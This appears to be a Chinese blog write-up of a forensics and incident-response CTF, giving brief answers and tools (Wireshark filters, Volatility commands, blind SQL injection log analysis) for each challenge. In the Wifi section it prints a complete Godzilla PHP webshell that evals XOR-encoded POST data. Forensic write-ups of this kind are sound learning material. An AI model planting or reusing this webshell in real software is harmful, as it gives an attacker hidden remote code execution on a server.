前言

这比赛应该叫应急响应比赛,而且flag交三次就不能交了,就因为我交错一道题然后差一道进线下,气死了。

Jwt

2.1 jwt

题目提示

2.2

搜索username得到



10087#admin

2.3 root

不是root就是admin

2.4 1.c



2.5 looter.so



2.6 /etc/pam.d/common-auth

Webshell

3.1

Admin123!@#





http.request.method == "POST" && http contains "login"

https://blog.csdn.net/qq_43431158/article/details/107176918

3.2

/var/www/html/data/Runtime/Logs/Home/21_08_07.log



3.3

www-data

3.4

1.php



3.5



frpc

3.6

192.168.239.123

3.7

0HDFt16cLQJ#JTN276Gp

日志分析

4.1 www.zip

4.2 sess_car

4.3 SplFileObject

内存分析

python ./vol.py -f Target.vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000007d8c7d10 -D ./ -u

发现有关华为的东西,用volatility的dumpfiles命令dump下来,导出来改成rar后缀解压,发现是个华为手机的备份包

然后用脚本进行解密,具体参考Huawei backup - decrypt (linkedin.com),一定要用python3.7,但不要用参考链接给的python3.7,有问题

实测python3.5也可以直接跑



发现还需要一个密码,然后用volatility的lsadump命令,发现密码



根据提示,没有空格键,有下划线,W31C0M3_T0_THiS_34SY_F0R3NSiCX,然后用脚本的命令



恢复文件得到flag

简单的日志分析

7.1

user



7.2

/Th4s_IS_VERY_Import_Fi1e



7.3





192.168.2.197:8888

SQL注入

8.1

分析日志,攻击者在通过sql盲注来获取flag

布尔盲注

8.2

分析sql语句的内容 select flag from sqli.flag

sqli#flag#flag

8.3

分析盲注的编号的最后一个比较 说明匹配上了

如上 最后一个字符是%7D 也就是} 向上匹配可得flag

flag{deddcd67-bcfd-487e-b940-1217e668c7db}

IOS

10.1

搜索github找到

10.2

同上

10.3





10.4

搜索select,找到流量

把192.168.1.12的流量全部提出来



因为是盲注,所以直接看盲注每一个字节的流量的最后一条

一个一个提出来:37 34 36 35 35 38 66 33 2D 63 38 34 31 2D 34 35 36 62 2D 38 35 64 37 2D 64 36 63 30 66 32 65 64 61 62 62 32 5A 5A 5A 6A

转字符串:746558f3-c841-456b-85d7-d6c0f2edabb2ZZZj

提交不对,发现有N个Z,怀疑从Z开始就是注多了的,去掉ZZZj,提交

10.5

10-499

10.7

已知192.168.1.12被盲注,尝试加上192.168.1.8,发现不对,查看日志文件,得到IP 172.28.0.3,不对,去wireshark寻找,找不到这个IP



尝试搜索172.28.0.2,找到了

再尝试提交,172.28.0.2#192.168.1.12

成功

10.8

Wifi

@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='key';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (stripos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}

通过镜像的vmep文件分析,提取出了一个压缩包

dump下来后发现密码提示是network adapter的guid

通过搜索注册表得到了guid 解压下来是一wifi密码和ssid 在wireshark中配置一下密码和ssid 得到一个wifi包

在wifi包中发现有哥斯拉流量 在网上搜索解密的脚本 默认配置即可 得到flag

flag{5db5b7b0bb74babb66e1522f3a6b1b12}

最新文章

  1. HTML 学习笔记 JavaScript(面向对象)
  2. Python实现简单的Web(续)
  3. The import javax.servlet cannot be resolved
  4. 手机端布局 - rem计算
  5. 设置UIImage的渲染模式:UIImage.renderingMode
  6. Slave2: no datanode to stop(HADOOP_PID_DIR)
  7. dp题目列表
  8. SQL中EXISTS的用法和效率
  9. rsyslog 报 WARNING: rsyslogd is running in compatibility mode.
  10. ruby on rails 中render的使用
  11. winds引导配置数据文件包含的os项目无效
  12. OpenRisc-30-SD card controller模块分析与验证
  13. WIP jobs available to MRP
  14. 输入一个数字n 如果n为偶数则除以2,若为奇数则加1或者减1,直到n为1,求最少次数 写出一个函数
  15. Eclipse汉化后如何还原为EN英文(实用技巧) --转
  16. SVN的安装与配置
  17. Error watching file for changes: EMFILE
  18. 05 IO和管道
  19. 你不得不知道的 .NET CORE —— .NET Framework, .NET Core 和 .NET Standard 的区别
  20. Office2016自定义安装

热门文章

  1. 定要过python二级 第10套
  2. CF1556D-Take a Guess【交互】
  3. P6640-[BJOI2020]封印【SAM,二分】
  4. python numpy loadtxt
  5. jupyter 快捷命令
  6. spring-data-redis 上百万的 QPS 压力太大连接失败,我 TM 人傻了
  7. JAVA 150道笔试题知识点整理
  8. 【原创】SystemVerilog中的typedef前置声明方式
  9. 使用 WPF + Chrome 内核实现 在线客服系统 的复合客服端程序
  10. 题解 「2017 山东一轮集训 Day7」逆序对